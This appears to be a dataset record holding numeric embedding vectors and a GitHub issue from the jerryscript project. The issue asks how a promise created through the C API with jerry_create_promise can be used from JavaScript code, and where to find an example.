-0.02510877326130867, -0.012821342796087265, 0.011442066170275211, 0.0188649483025074, -0.011783177964389324, -0.021193405613303185, 0.0037707651499658823, 0.023596016690135002, 0.0287423525005579, 0.003754080506041646, 0.006406963802874088, 0.01638818345963955, -0.005465199705213308, 0.009558537974953651, -0.014274775050580502, 0.016491999849677086, 0.004779268987476826, -0.0020114455837756395, -0.012035303749144077, -0.0028401240706443787, 0.0005533792427740991, 0.0037930116523057222, -0.03369588404893875, 0.006373594049364328, -0.004994317423552275, 0.02006625570356846, 0.0053502595983445644, 0.00043867123895324767, -0.01678861863911152, -0.011961149051785469, -0.0014219158329069614, -0.022350218147039413, 0.006525611504912376, 0.0007174464990384877, 0.002074477029964328, -0.013651875779032707, -0.012487647123634815, 0.02120823599398136, -0.008601942099630833, 0.05523040145635605, 0.01710006780922413, 0.013421996496617794, 0.007545237895101309, -0.011968564242124557, -0.009298996068537235, -0.004189739003777504, 0.01029266882687807, -0.026057953014969826, 0.01397074107080698, -0.012013057246804237, -0.018123403191566467, 0.002612098352983594, -0.009684600867331028, 0.02019973285496235, -0.03262805566191673, -0.007193003315478563, -0.003711441531777382, 0.006851891987025738, -0.01001088134944439, 0.019873453304171562, 0.004404787439852953, 0.005027686711400747, -0.013325595296919346, 0.005854511633515358, 0.00631056260317564, -0.007478498853743076, 0.005376213695853949, -0.0028123159427195787, -0.026013460010290146, 0.017307700589299202, 0.0038263811729848385, 0.006032482720911503, -0.02006625570356846, 0.004823761526495218, -0.0037967192474752665, 0.0013644460123032331, 0.023877805098891258, -0.02143070101737976, -0.009113609790802002, 0.008891145698726177, 0.013221777975559235, -0.01439342275261879, -0.00690750777721405, -0.004575343336910009, 0.01390400156378746, -0.00479409983381629, -0.0016592108877375722, -0.006065852474421263, 0.01430443674325943, 0.03698835149407387, -0.006499657407402992, 0.006132591515779495, 0.001859428477473557, 0.00674436753615737, -0.007000201381742954, 0.00208189245313406, -0.0004792245745193213, -0.016506830230355263, -0.027155442163348198, -0.0029958488885313272, -0.00956595316529274, 0.00478297658264637, 0.005320597905665636, -0.01882045716047287, 0.030522063374519348, -0.007682424038648605, 0.005472614895552397, -0.01107129268348217, 0.010841413401067257, 0.022246401757001877, 0.0015516865532845259, 0.011946317739784718, -0.02285446971654892, 0.015216539613902569, -0.018850117921829224, 0.01102679967880249, -0.020392535254359245, 0.0066961669363081455, -0.01797509379684925, -0.005835972726345062, 0.0019113367889076471, -0.002369241788983345, -0.008208922110497952, -0.01669963262975216, 0.004401079844683409, -0.006017651874572039, 0.0003102909540757537, -0.011434650979936123, 0.014289605431258678, 0.006236407905817032, 0.009892233647406101, -0.006406963802874088, 0.006774029694497585, 0.00038004270754754543, -0.003694756655022502, -0.003203481901437044, 0.026517711579799652, 0.0017509772442281246, 0.009751339443027973, -0.0056246318854391575, -0.018049247562885284, -0.0036057711113244295, -0.029083462432026863, -0.013978156261146069, -0.010856244713068008, 0.010240760631859303, -0.020348042249679565, -0.0024878892581909895, -0.007345020305365324, 0.02058533765375614, -0.011686776764690876, -0.018182726576924324, 0.0028123159427195787, 0.0018214242300018668, -0.0005487445741891861, 0.011968564242124557, -0.002167170401662588, 0.01850900612771511, 0.018583161756396294, -0.03215346857905388, 0.00734131271019578, 0.003970982972532511, -0.003162696957588196, -0.0012179905315861106, 0.0030440494883805513, 0.010329745709896088, 0.024322733283042908, -0.005268689710646868, 0.019828960299491882, -0.00020369362027850002, -0.00014089388423599303, 0.006039898376911879, 0.005761818028986454, 0.002100431127473712, 0.008253415115177631, -0.0014423084212467074, 0.017381856217980385, 0.006851891987025738, 0.010700519196689129, 0.0009343489073216915, 0.045145366340875626, -0.006117760669440031, 0.020822633057832718, -0.013985571451485157, -0.0007707451586611569, 0.0064106713980436325, -0.004986901767551899, 0.005461491644382477, -0.01692209579050541, 0.004167492501437664, 0.0008476806106045842, 0.015290694311261177, -0.0030774190090596676, 0.009261919185519218, -0.00031144963577389717, -0.0028160237707197666, 0.01162745337933302, -0.0030681495554745197, -0.00434917164966464, 0.009847740642726421, 0.003709587501361966, 0.012235521338880062, -0.004538265988230705, 0.018835287541151047, -0.0059805745258927345, -0.0016944343224167824, -0.008653850294649601, 0.013147624209523201, 0.0014849473955109715, -0.029736025258898735, 0.0035445934627205133, -0.0065033650025725365, 0.0035353240091353655, 0.012153951451182365, 0.01739668659865856, 0.009425058960914612, 0.02249852754175663, 0.010841413401067257, 0.014148712158203125, 0.03746294230222702, -0.005658001638948917, 0.011634868569672108, 0.013496151193976402, -0.0074933297000825405, -0.024500705301761627, -0.020170072093605995, -0.0029550637118518353, 0.004590174183249474, -0.008557449094951153, -0.00952146016061306, -0.015735622495412827, 0.011694191955029964, -0.010871075093746185, -0.015780115500092506, 0.0016369643853977323, 0.0010910006240010262, -0.006729536689817905, 0.02564268559217453, 0.006225285120308399, 0.0051129646599292755, -0.011442066170275211, 0.004434449598193169, 0.007322774268686771 ]
2,078
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
when create promise in C file, like this: E.g.: ```sh jerry_value_t test_promise = jerry_create_promise(); jerry_value_t argument = jerry_create_string((jerry_char_t*)"promise"); jerry_value_t is_ok = jerry_resolve_or_reject_promise (test_promise, argument, true); ``` and then, how to get this promise in js?? where to find an example?
How to use promise in jerryscript?
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4782/comments
8
2021-09-28T03:11:37
2021-12-08T07:45:53Z
https://github.com/jerryscript-project/jerryscript/issues/4782
1,009,092,412
4,782
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : How to use promise in jerryscript? Issue date: --- start body --- when create promise in C file, like this: E.g.: ```sh jerry_value_t test_promise = jerry_create_promise(); jerry_value_t argument = jerry_create_string((jerry_char_t*)"promise"); jerry_value_t is_ok = jerry_resolve_or_reject_promise (test_promise, argument, true); ``` and then, how to get this promise in js?? where to find an example? --- end body ---
649
[ -0.01604675129055977, -0.01231901254504919, -0.021915027871727943, 0.019046416506171227, -0.009312067180871964, 0.025380659848451614, 0.025045746937394142, 0.05256694555282593, -0.03652019426226616, 0.03436509519815445, -0.010862864553928375, 0.013702353462576866, 0.008766011334955692, 0.00722249411046505, 0.026676632463932037, 0.03285070136189461, -0.02616698108613491, -0.005333142355084419, -0.008059779182076454, 0.001264118473045528, 0.00718609057366848, 0.026050489395856857, 0.014809025451540947, 0.03643282502889633, 0.03576299548149109, 0.00120132218580693, 0.008525746874511242, -0.004215548746287823, -0.049887631088495255, -0.018871678039431572, -0.01930852234363556, 0.03352052718400955, -0.0054496340453624725, -0.004634191282093525, 0.017182547599077225, 0.01783781312406063, 0.04219917207956314, -0.006501701194792986, -0.0288899764418602, -0.023487668484449387, -0.01186760701239109, -0.010651722550392151, -0.008605835027992725, 0.0011776597239077091, 0.020313264802098274, 0.06354629993438721, 0.026603825390338898, 0.007550127804279327, -0.015726398676633835, -0.01191129069775343, 0.012784980237483978, -0.01791062019765377, 0.030491739511489868, -0.059527333825826645, 0.00003936150096706115, -0.005930162966251373, 0.011496288701891899, -0.040510039776563644, 0.024900130927562714, -0.005362265277653933, -0.0119768176227808, 0.006330603733658791, -0.002766681369394064, 0.0034019257873296738, 0.0012104230700060725, 0.08102007955312729, -0.034190356731414795, 0.028351202607154846, 0.014466830529272556, 0.012413661926984787, 0.058071184903383255, 0.016469035297632217, 0.025424344465136528, 0.03054998628795147, -0.02318187616765499, 0.025744697079062462, 0.00751372380182147, 0.016745703294873238, 0.02326924540102482, -0.021259762346744537, -0.0011394358007237315, -0.027856111526489258, -0.01603218913078308, 0.011074005626142025, -0.02131800726056099, -0.007659338880330324, -0.01687675528228283, -0.05810030549764633, 0.011583657935261726, 0.0289482232183218, 0.02131800726056099, 0.02874436229467392, 0.0020349668338894844, 0.00714968703687191, 0.016905879601836205, 0.016614649444818497, 0.007906883955001831, 0.0014479572419077158, -0.018696941435337067, -0.03322929888963699, 0.04659673571586609, 0.03462719917297363, -0.025933995842933655, 0.004069933667778969, -0.009690665639936924, 0.04365531727671623, 0.06843895465135574, -0.014394023455679417, 0.027026107534766197, 0.042024433612823486, 0.008183551952242851, 0.0013633186463266611, -0.009930930100381374, 0.00923197902739048, -0.0025027545634657145, 0.022089766338467598, -0.00934118963778019, -0.03468544781208038, 0.0144449882209301, -0.00033013607026077807, -0.035034921020269394, 0.01464884914457798, -0.022526610642671585, -0.01860957220196724, -0.02548259124159813, 0.05186799168586731, 0.008838818408548832, 0.01910466141998768, 0.016643771901726723, 0.0333457887172699, -0.04042267054319382, -0.05533362552523613, -0.01958519034087658, -0.018099920824170113, 0.028511378914117813, 0.02144906111061573, -0.006705561652779579, 0.02054624818265438, -0.04546094313263893, -0.04639287665486336, -0.039956703782081604, -0.03352052718400955, 0.011714710853993893, -0.03151104226708412, 0.0030524502508342266, 0.0037641427479684353, -0.022235380485653877, 0.01381884515285492, -0.02277415618300438, 0.014925517141819, -0.00354208005592227, -0.01364410761743784, 0.024273987859487534, -0.012268046848475933, 0.012071467004716396, 0.014656130224466324, -0.015624468214809895, -0.0038879152853041887, 0.03806370869278908, 0.037190020084381104, -0.027229968458414078, -0.04825674742460251, 0.0026793123688548803, 0.014998325146734715, -0.04680059850215912, 0.019352206960320473, -0.014517796225845814, 0.044179532676935196, -0.019614314660429955, 0.007000431884080172, -0.025657327845692635, -0.00926838256418705, 0.02019677311182022, 0.018580449745059013, -0.03209350258111954, -0.00741179333999753, 0.029108399525284767, 0.0031216174829751253, 0.0370735302567482, -0.029399629682302475, 0.029050152748823166, 0.020720986649394035, -0.007269819267094135, 0.026501893997192383, -0.024827323853969574, 0.006723763421177864, 0.007659338880330324, -0.04755779355764389, 0.03413211181759834, -0.024055564776062965, -0.014153758995234966, 0.014044547453522682, 0.04508234187960625, -0.014605164527893066, 0.04263601452112198, 0.005198448430746794, -0.0009059971198439598, -0.03686966747045517, -0.025919435545802116, -0.01763395220041275, 0.004645112436264753, -0.033637020736932755, -0.02408468909561634, -0.018143605440855026, -0.0289482232183218, -0.008605835027992725, 0.027098914608359337, -0.01177295669913292, 0.008132587186992168, -0.012581119313836098, -0.005041912663727999, -0.009115486405789852, 0.01280682161450386, -0.043771810829639435, -0.007197011727839708, 0.008540308102965355, 0.01826009713113308, 0.01735728420317173, -0.01163462270051241, -0.028424009680747986, 0.004499497357755899, -0.010193035937845707, -0.028016287833452225, -0.031132444739341736, -0.02644364908337593, -0.031773149967193604, -0.02977822721004486, 0.03553001210093498, -0.013105332851409912, 0.025642767548561096, 0.03136542811989784, -0.0020149447955191135, -0.004452172666788101, 0.007914165034890175, -0.001680940855294466, -0.01930852234363556, -0.019060978665947914, -0.028758924454450607, -0.010608038865029812, 0.006672798190265894, -0.018434833735227585, -0.010469704866409302, -0.038034588098526, -0.029341382905840874, 0.021827658638358116, 0.005580687429755926, -0.035093169659376144, -0.004211908206343651, -0.0041136182844638824, -0.0024499690625816584, -0.00023912680626381189, 0.004728840664029121, -0.025380659848451614, -0.0033054561354219913, -0.00364401051774621, 0.024798201397061348, -0.005074676126241684, 0.04645112156867981, 0.009253820404410362, -0.014772621914744377, 0.006225032731890678, -0.014182882383465767, -0.02326924540102482, -0.013614984229207039, 0.014597884379327297, 0.015071132220327854, -0.04601427912712097, -0.009843560867011547, 0.02679312415421009, -0.007819514721632004, 0.031773149967193604, -0.04222829267382622, 0.011001198552548885, 0.06756526976823807, -0.024390479549765587, 0.006377928424626589, -0.02769593521952629, 0.021303445100784302, -0.006130383349955082, -0.005708100274205208, 0.004099056590348482, 0.03220999613404274, 0.025497151538729668, 0.018769748508930206, -0.003895196132361889, -0.02999665029346943, 0.014736218377947807, -0.00920285563915968, -0.02222081832587719, 0.016265174373984337, -0.014430426992475986, -0.03672405332326889, 0.029967525973916054, 0.01468525268137455, 0.04388830065727234, -0.0012568377424031496, -0.018434833735227585, -0.011030321009457111, 0.024900130927562714, 0.04907218739390373, 0.014226566068828106, -0.03943248838186264, -0.013891652226448059, 0.022890647873282433, -0.027113476768136024, 0.024885570630431175, 0.02597768045961857, 0.007819514721632004, -0.0026847729459404945, 0.017604829743504524, 0.06407051533460617, -0.03220999613404274, -0.034889306873083115, 0.0032817935571074486, -0.024142934009432793, 0.028860853984951973, 0.03020051121711731, 0.008314604870975018, -0.02137625403702259, -0.00035334343556314707, -0.021332569420337677, -0.014102794229984283, -0.05352800339460373, -0.010906549170613289, 0.053760986775159836, 0.04048091545701027, -0.027113476768136024, 0.010091106407344341, -0.011583657935261726, -0.021405376493930817, 0.04601427912712097, -0.04528620466589928, -0.01700780913233757, 0.021434498950839043, -0.06220664456486702, -0.05812942981719971, -0.06791474670171738, 0.028089094907045364, 0.021623797714710236, -0.023575037717819214, -0.021696606650948524, -0.02275959402322769, 0.015580784529447556, -0.017124300822615623, 0.033083684742450714, -0.047324810177087784, -0.01002557948231697, 0.03486018255352974, 0.018842555582523346, 0.0124282231554389, 0.000853666802868247, 0.00593744358047843, 0.032588593661785126, 0.0009737990330904722, 0.04083039239048958, -0.021332569420337677, -0.003229008289054036, -0.03206437826156616, 0.00811802502721548, 0.003525698557496071, -0.009159171022474766, -0.02179853618144989, 0.01488911360502243, 0.025322414934635162, -0.01665833406150341, -0.029967525973916054, -0.022541170939803123, -0.007182450033724308, -0.05504239723086357, -0.016017628833651543, -0.013797002844512463, 0.014080951921641827, 0.024419602006673813, -0.016163242980837822, -0.01804167404770851, -0.011190497316420078, -0.004503137897700071, 0.022613979876041412, -0.018973609432578087, 0.027200846001505852, -0.011226901784539223, -0.011161374859511852, -0.01639622636139393, 0.0039061170537024736, -0.007899602875113487, 0.008540308102965355, 0.006516262423247099, 0.025657327845692635, 0.0029650814831256866, -0.015857452526688576, -0.02575925923883915, -0.001311443280428648, -0.030782969668507576, -0.03681142255663872, -0.025307852774858475, 0.011816641315817833, -0.010928391478955746, -0.026196103543043137, 0.01715342327952385, -0.013163578696548939, -0.0065781488083302975, -0.06418700516223907, 0.015478854067623615, -0.005114720202982426, -0.0344233401119709, -0.002901375060901046, 0.0013469369150698185, -0.031190691515803337, -0.004157302435487509, 0.03005489520728588, 0.008168990723788738, -0.027783304452896118, -0.012566558085381985, 0.03191876411437988, 0.05012061446905136, 0.035151414573192596, 0.040364425629377365, -0.009246540255844593, -0.009938210248947144, 0.02222081832587719, -0.009282943792641163, -0.017167985439300537, -0.010382335633039474, -0.015216747298836708, -0.011860325932502747, -0.027652250602841377, -0.026676632463932037, -0.0028758924454450607, -0.012930594384670258, -0.024128373712301254, -0.04021880775690079, -0.014503234066069126, -0.01138707809150219, 0.0035202379804104567, 0.0389956459403038, -0.01204962469637394, 0.011175936087965965, -0.031773149967193604, -0.020502563565969467, -0.006352446042001247, -0.004288355819880962, 0.028001727536320686, -0.008503904566168785, -0.017866935580968857, -0.021638359874486923, -0.0023899029474705458, -0.07601092755794525, -0.014517796225845814, 0.017444653436541557, -0.0046378313563764095, 0.0028067254461348057, 0.01881343312561512, -0.004612348973751068, 0.006370647810399532, 0.003356421133503318, -0.012224363163113594, -0.07036107033491135, 0.027928918600082397, -0.014743498526513577, 0.008773292414844036, -0.011023040860891342, 0.0005678977468051016, -0.007440916728228331, 0.0009191934368573129, -0.022948892787098885, 0.03602510318160057, 0.006669158115983009, 0.01894448697566986, -0.011474446393549442, -0.0020185853354632854, 0.018638694658875465, 0.02388082817196846, 0.028991907835006714, 0.014838148839771748, -0.006483498960733414, -0.022337311878800392, 0.01798342913389206, -0.03646194562315941, 0.030084019526839256, -0.028482256457209587, -0.007328065112233162, -0.028977345675230026, -0.04013143852353096, 0.042024433612823486, 0.008445658721029758, -0.042461276054382324, -0.007892322726547718, -0.00937759317457676, 0.0003940700553357601, 0.02102677710354328, 0.008074341341853142, -0.01440130453556776, -0.020298704504966736, -0.02789979614317417, -0.015406046062707901, -0.0037386601325124502, -0.030579108744859695, -0.0037040766328573227, 0.02805997245013714, 0.014321216382086277, 0.02048800326883793, -0.04569392651319504, 0.026501893997192383, 0.032035257667303085, 0.0184785183519125, 0.014153758995234966, -0.01582833006978035, 0.03672405332326889, -0.03462719917297363, -0.007986972108483315, -0.008540308102965355, -0.04406303912401199, -0.016643771901726723, -0.0010211238404735923, 0.0006702831597067416, -0.017517460510134697, -0.010942952707409859, 0.014969201758503914, 0.012275327928364277, 0.009734349325299263, -0.00036107920459471643, -0.01395717915147543, -0.00760109256953001, 0.012719453312456608, 0.0095086470246315, 0.005089237354695797, 0.007124204188585281, 0.022439241409301758, -0.03625808656215668, -0.0479072704911232, -0.03663668408989906, 0.021303445100784302, -0.01228260900825262, 0.04761604219675064, -0.008678642101585865, -0.018172727897763252, 0.003127077827230096, 0.04033530130982399, 0.00364401051774621, 0.018653256818652153, -0.01777956821024418, 0.046130768954753876, -0.007521004881709814, 0.005729942582547665, 0.00722249411046505, 0.005584327969700098, 0.003942520823329687, 0.007400872651487589, -0.006683719344437122, 0.015551661141216755, -0.008074341341853142, -0.0025318774860352278, -0.022410118952393532, 0.018230972811579704, -0.004091775976121426, -0.016294296830892563, 0.006439814809709787, -0.002076831180602312, -0.02824927121400833, -0.023429421707987785, 0.0027776022907346487, 0.013338316231966019, 0.009989175945520401, 0.004179144743829966, -0.021580113098025322, -0.024550655856728554, -0.016192365437746048, 0.03587948903441429, -0.028511378914117813, 0.0053076595067977905, 0.012777699157595634, -0.007834076881408691, -0.000968338456004858, -0.004135460592806339, 0.008205394260585308, -0.00240264437161386, -0.0033291184809058905, 0.017459215596318245, -0.007761268876492977, -0.004368443973362446, 0.02728821523487568, 0.004932701587677002, -0.011882168240845203, 0.022177135571837425, -0.00047506828559562564, -0.021303445100784302, 0.008576711639761925, -0.04027705639600754, -0.009093644097447395, -0.038762662559747696, -0.010047421790659428, -0.016687456518411636, 0.011183217167854309, 0.003891555592417717, 0.019672559574246407, -0.03267596289515495, -0.004106337670236826, 0.020502563565969467, 0.05518801137804985, -0.01734272390604019, -0.002974182367324829, 0.004634191282093525, 0.0022078845649957657, -0.025307852774858475, -0.01440130453556776, -0.006468937732279301, 0.036549314856529236, -0.011445323936641216, -0.002528236946091056, 0.04365531727671623, -0.02561364322900772, 0.006665517576038837, 0.02743382938206196, -0.016789386048913002, -0.02220625802874565, -0.008620396256446838, -0.036345455795526505, 0.036957036703825, 0.00140609301161021, 0.03762686625123024, 0.019949227571487427, -0.015216747298836708, 0.01783781312406063, -0.036607563495635986, -0.004812569357454777, 0.021230638027191162, -0.04021880775690079, -0.002044067718088627, -0.016469035297632217, -0.04059740900993347, 0.0014652489917352796, -0.020255019888281822, -0.013753318227827549, -0.006840255577117205, -0.019803613424301147, 0.04505322128534317, 0.007197011727839708, 0.00029395989258773625, -0.0007571969763375819, -0.008780572563409805, -0.006443454883992672, 0.0014697994338348508, -0.0004659673722926527, 0.04013143852353096, -0.0036276287864893675, 0.0041827852837741375, -0.006800211500376463, 0.01882799342274666, -0.005992049351334572, -0.005034632049500942, -0.02817646414041519, 0.009632418863475323, -0.013826125301420689, 0.0010047421092167497, -0.006476218346506357, 0.018871678039431572, 0.02041519619524479, 0.010986637324094772, -0.030375247821211815, -0.01804167404770851, -0.0090281181037426, -0.007146046496927738, -0.008270921185612679, -0.00040976915624924004, 0.03171490505337715, -0.019177470356225967, 0.019395891577005386, 0.04283987730741501, -0.021842220798134804, 0.013207262381911278, -0.004728840664029121, 0.004674235358834267, 0.011263305321335793, -0.008969872258603573, -0.007593811955302954, -0.00473976181820035, -0.020255019888281822, -0.017721321433782578, -0.01796886697411537, 0.007153327111154795, -0.015245869755744934, 0.0022916130255907774, -0.004503137897700071, -0.00797969102859497, 0.022992577403783798, -0.002992384135723114, -0.005122000817209482, -0.01882799342274666, 0.019628874957561493, 0.01597394421696663, 0.006345164962112904, 0.014066389761865139, 0.05463467538356781, 0.0280454121530056, 0.002033146796748042, 0.01610499806702137, 0.023487668484449387, 0.0046960776671767235, -0.043014612048864365, -0.025744697079062462, -0.016075873747467995, -0.009930930100381374, -0.00954505056142807, 0.0028485895600169897, 0.004787086509168148, 0.04179145023226738, 0.004597787279635668, -0.0010302247246727347, -0.015493415296077728, 0.020808355882763863, 0.016206927597522736, 0.03285070136189461, -0.023167315870523453, 0.016134120523929596, -0.010527950711548328, -0.0037641427479684353, 0.008583992719650269, -0.011168655939400196, -0.025322414934635162, 0.015449730679392815, -0.02519136108458042, -0.025235045701265335, -0.026749439537525177, -0.022104326635599136, 0.015071132220327854, -0.01964343711733818, 0.0020204053726047277, 0.003452891018241644, -0.01020031701773405, 0.003230828559026122, -0.02214801125228405, -0.026210665702819824, -0.015274993143975735, 0.007164248265326023, -0.03186051920056343, -0.002513675484806299, -0.016003066673874855, 0.029268575832247734, 0.0034747333265841007, 0.015595345757901669, -0.00934118963778019, 0.012683049775660038, -0.03698616102337837, 0.0011412560706958175, 0.01999291218817234, -0.016541842371225357, -0.03861704468727112, -0.0008550319471396506, -0.025701012462377548, -0.05070307478308678, 0.02047344110906124, 0.03628721088171005, 0.022803278639912605, -0.031074199825525284, 0.01020031701773405, 0.024128373712301254, 0.018726063892245293, -0.010666284710168839, 0.015435169450938702, 0.002513675484806299, 0.012792260386049747, 0.023240122944116592, 0.0047106388956308365, 0.03375351056456566, -0.01235541608184576, -0.025118554010987282, 0.0032908946741372347, -0.02021133527159691, -0.0008313695434480906, 0.018507640808820724, -0.010280405171215534, 0.005547923967242241, -0.014765340834856033, -0.0037495812866836786, 0.008365570567548275, -0.018099920824170113, -0.01033865101635456, -0.006538104731589556, -0.004812569357454777, 0.006268717348575592, -0.00006973584095248953, -0.0018092639511451125, -0.01713886298239231, 0.020808355882763863, 0.012384539470076561, 0.010913829319179058, 0.0280454121530056, -0.004990947432816029, -0.0005856445641256869, -0.01630885899066925, -0.013709633611142635, -0.019483260810375214, 0.0069458261132240295, -0.0006302390829659998, 0.028904538601636887, -0.013585860840976238, -0.022948892787098885, 0.021915027871727943, -0.005456914659589529, 0.0009628778789192438, 0.04158758744597435, -0.005791828967630863, 0.013935336843132973, 0.03375351056456566, 0.02568645216524601, 0.03762686625123024, -0.023997319862246513, -0.003705896669998765, -0.018842555582523346, 0.038558799773454666, -0.012639365158975124, -0.014867271296679974, -0.019046416506171227, -0.016745703294873238, 0.014561480842530727, -0.009799876250326633, 0.03337491303682327, 0.00951592717319727, 0.05026623234152794, 0.02500206232070923, 0.030841216444969177, 0.002792163984850049, 0.022541170939803123, 0.00011956340313190594, -0.021754851564764977, 0.0005460554966703057, 0.03465632349252701, 0.011496288701891899, 0.021157830953598022, 0.04403391852974892, -0.005296738352626562, 0.01166374608874321, -0.033491406589746475, 0.036898791790008545, -0.03541352227330208, 0.02102677710354328, -0.011357954703271389, 0.033782634884119034, -0.03491843119263649, 0.03847143054008484, 0.004099056590348482, -0.004626910202205181, -0.028074534609913826, -0.013491211459040642, -0.0009865403408184648, -0.0099600525572896, -0.0243759173899889, -0.0022970736026763916, -0.03034612536430359, 0.005074676126241684, 0.007164248265326023, 0.008278201334178448, -0.01277041807770729, 0.029472436755895615, -0.0033018155954778194, -0.0052930982783436775, -0.008547589182853699, -0.012173397466540337, -0.004291996359825134, -0.01176567655056715, 0.04150021821260452, 0.02144906111061573, 0.0012823203578591347, -0.046130768954753876, 0.008074341341853142, -0.02527873031795025, 0.013447526842355728, -0.04761604219675064, -0.013746037147939205, -0.01502744760364294, -0.01481630653142929, -0.0015535278944298625, -0.01874062605202198, 0.005409589968621731, 0.012755856849253178, 0.011263305321335793, -0.040160562843084335, -0.01700780913233757, 0.006377928424626589, -0.0019039135659113526, 0.015085693448781967, 0.00477616535499692, -0.03951985761523247, -0.006996791344136, 0.01453963853418827, -0.029603490605950356, -0.004164583515375853, -0.0044084880501031876, -0.010862864553928375, -0.021303445100784302, -0.0068038515746593475, -0.015420608222484589, -0.003935240209102631, -0.01611955836415291, 0.0020222256425768137, 0.021915027871727943, -0.0033746231347322464, -0.020881162956357002, -0.0004946353146806359, 0.01881343312561512, -0.015056570991873741, -0.022366434335708618, 0.00622867327183485, -0.026953300461173058, 0.025642767548561096, 0.012901471927762032, 0.022366434335708618, 0.014481392689049244, 0.005973847582936287, 0.035792119801044464, 0.018711501732468605, 0.01461244560778141, -0.009297505021095276, -0.006097619887441397, -0.03392824903130531, 0.004561383742839098, -0.013112612999975681, 0.006341524887830019, 0.0016481776256114244, 0.0424904003739357, -0.008773292414844036, -0.014328496530652046, 0.004830771125853062, -0.005860995966941118, 0.016163242980837822, -0.023691529408097267, -0.02340029925107956, -0.006021172273904085, 0.007400872651487589, 0.03823844715952873, 0.0019457777962088585, 0.018988169729709625, 0.0285259410738945, -0.009181013330817223, 0.006112181581556797, -0.008387412875890732, -0.011532692238688469, -0.00603937404230237, -0.02653101645410061, -0.027375582605600357, 0.030841216444969177, 0.010469704866409302, 0.016075873747467995, -0.006083058658987284, -0.009901806712150574, 0.03663668408989906, -0.027448391541838646, 0.012450065463781357, 0.008824257180094719, -0.007724865339696407, 0.0008067970047704875, -0.03075384721159935, -0.015886574983596802, -0.023589598014950752, -0.007834076881408691, -0.0024354076012969017, -0.011452604085206985, -0.00354936090297997, -0.01625061221420765, 0.02061905711889267, -0.005300378892570734, 0.03229736536741257, 0.0004520884540397674, -0.010112947784364223, 0.0018329262966290116, 0.015507976524531841, -0.007415433879941702, 0.026225225999951363, -0.031481921672821045, -0.02139081433415413, -0.002058629412204027, 0.011212339624762535, 0.012901471927762032, 0.021958712488412857, 0.009086363948881626, 0.014954640530049801, 0.0029159365221858025, -0.030520863831043243, -0.020997654646635056, -0.00018873043882194906, -0.04508234187960625, 0.00011979092960245907, 0.01999291218817234, 0.013629545457661152, 0.025089431554079056, -0.027754181995987892, 0.04117986559867859, 0.011452604085206985, -0.019323084503412247, 0.024186618626117706, -0.006516262423247099, -0.0017091537592932582, 0.03270508348941803, -0.03486018255352974, -0.019410453736782074, 0.03628721088171005, -0.00010386430949438363, 0.0016527280677109957, -0.03285070136189461, -0.02207520417869091, -0.016774825751781464, 0.02076467126607895, 0.011998659931123257, -0.0022188054863363504, 0.019818175584077835, -0.00017360014317091554, 0.043072860687971115, 0.006341524887830019, -0.032588593661785126, 0.022439241409301758, -0.027171721681952477, -0.0031762230210006237, 0.0006425253232009709, -0.037452127784490585, 0.021682044491171837, 0.03069560043513775, -0.00235167914070189, 0.012886909767985344, 0.057663463056087494, 0.012136993929743767, -0.01568271405994892, -0.018158165737986565, 0.026953300461173058, 0.0015808306634426117, -0.0006548115634359419, 0.00985812209546566, -0.0025009342934936285, 0.0017382766818627715, 0.03917038068175316, -0.00020363320072647184, -0.011554534547030926, -0.013389280997216702, 0.0043247598223388195, 0.00009578723984304816, -0.00913004856556654, -0.03285070136189461, 0.00974891148507595, -0.06785649806261063, -0.009952771477401257, 0.026487333700060844, 0.08544676750898361, 0.022249942645430565, 0.005456914659589529, 0.007036835420876741, -0.01798342913389206, -0.00382602890022099, 0.0010638982057571411, 0.010651722550392151, -0.0074773202650249004, -0.022584855556488037, 0.023502228781580925, -0.008372851647436619, 0.02979278936982155, -0.01582833006978035, 0.024827323853969574, -0.023094508796930313, -0.006450735963881016, -0.024536093696951866, 0.004903578665107489, 0.014321216382086277, -0.008125306107103825, -0.020444318652153015, 0.0062796385027468204, 0.0026829526759684086, -0.0002586937916930765, -0.004816209431737661, 0.006731044501066208, 0.01977449096739292, 0.001222254242748022, 0.024812763556838036, -0.010659003630280495, 0.012377258390188217, -0.0018338364316150546, -0.004648752510547638, -0.0040954165160655975, -0.04027705639600754, 0.0007194281206466258, -0.0007453658035956323, 0.026501893997192383, -0.009501365944743156, -0.004048091359436512, -0.0027685014065355062, -0.005930162966251373, 0.006035733502358198, -0.016789386048913002, -0.026123296469449997, -0.012479188852012157, -0.02242467924952507, 0.0013878911267966032, 0.0036221682094037533, -0.021492745727300644, -0.0022078845649957657, -0.01804167404770851, 0.02005115896463394, 0.008547589182853699, 0.017240792512893677, 0.004011687822639942, 0.06925439834594727, -0.004736121743917465, 0.005926522426307201, 0.023138191550970078, -0.008088902570307255, 0.008052499033510685, 0.005719021428376436, -0.01741553097963333, 0.010091106407344341, -0.010709969326853752, 0.0035839444026350975, 0.02714259922504425, 0.010156632401049137, -0.013323755003511906, -0.0007895052549429238, 0.012719453312456608, -0.019002731889486313, -0.014146477915346622, 0.02415749616920948, -0.0033491405192762613, 0.005507879890501499, 0.02575925923883915, -0.010979356244206429, -0.005147483199834824, 0.04263601452112198, 0.006461657118052244, -0.005398668814450502, -0.03124893642961979, -0.013564019463956356, 0.00999645609408617, -0.014146477915346622, 0.008984433487057686, -0.00026665712357498705, -0.01512937806546688, -0.01839114911854267, 0.007637496571987867, 0.018798870965838432, 0.020575372502207756, -0.00926838256418705, -0.011896729469299316, 0.0009059971198439598, -0.0025901233311742544, 0.00359304528683424, 0.015711836516857147, -0.01860957220196724, -0.0017928823363035917, 0.005122000817209482, 0.0074918814934790134, -0.04021880775690079, 0.0007071418804116547, 0.0012977919541299343, -0.02109958603978157, 0.005620731506496668, -0.0016709298361092806, -0.0005246683140285313, -0.01604675129055977, -0.017095178365707397, -0.03270508348941803, 0.022410118952393532, 0.008219955489039421, 0.005500599276274443, 0.015624468214809895, -0.006643675267696381, 0.02763769030570984, 0.00002416011193417944, -0.0017728602979332209, -0.021754851564764977, -0.009872683323919773, -0.0076884618028998375, 0.019599752500653267, -0.011263305321335793, 0.017051493749022484, 0.0026611106004565954, -0.006101260427385569, -0.01027312409132719, 0.006399770732969046, -0.018900802358984947, 0.027579443529248238, -0.01225348562002182, -0.027098914608359337, -0.0021277964115142822, 0.0031671219039708376, 0.011962256394326687, 0.007950568571686745, -0.00392067851498723, 0.02026958018541336, -0.01791062019765377, 0.007044116035103798, 0.01839114911854267, -0.013352877460420132, 